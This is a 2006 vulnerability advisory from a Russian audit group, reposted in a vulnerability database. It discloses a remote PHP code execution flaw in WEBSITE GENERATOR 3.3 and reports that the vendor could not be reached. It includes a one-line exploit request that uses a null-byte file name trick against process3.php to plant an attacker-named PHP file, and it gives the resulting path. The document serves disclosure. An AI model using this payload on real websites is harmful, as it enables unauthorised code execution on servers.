NSA Group Security Advisory NSAG-№202-25.02.2006 Vulnerability WEBSITE GENERATOR 3.3

2006-02-26T00:00:00
ID SECURITYVULNS:DOC:11601
Type securityvulns
Reporter Securityvulns
Modified 2006-02-26T00:00:00

Description

Advisory: NSAG-№202-25.02.2006

Research: NSA Group [Russian company on Audit of safety & Network security]

Site of Research: http://www.nsag.ru or http://www.nsag.org

Product: WEBSITE GENERATOR 3.3

Site of manufacturer: http://freehostshop.com

The status: 19/11/2005 - Publication is postponed. 19/11/2005 - Manufacturer is not notified (there is no communication). 17/02/2006 - Publication of vulnerability.

Original Advisory: http://www.nsag.ru/vuln/894.html

Risk: Hide

Description: The removed user, can upload php script from other server and execute custom php code on webserver.

Exploit: Method GET: http://example.com/files/myforms/process3.php?formname=attack.php%00*name[0]= Link: http://example.com/files/myforms/forms/attack.php

More information: http://www.nsag.ru/vuln/894.html

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

www.nsag.ru «Nemesis» © 2006


Nemesis Security Audit Group © 2006.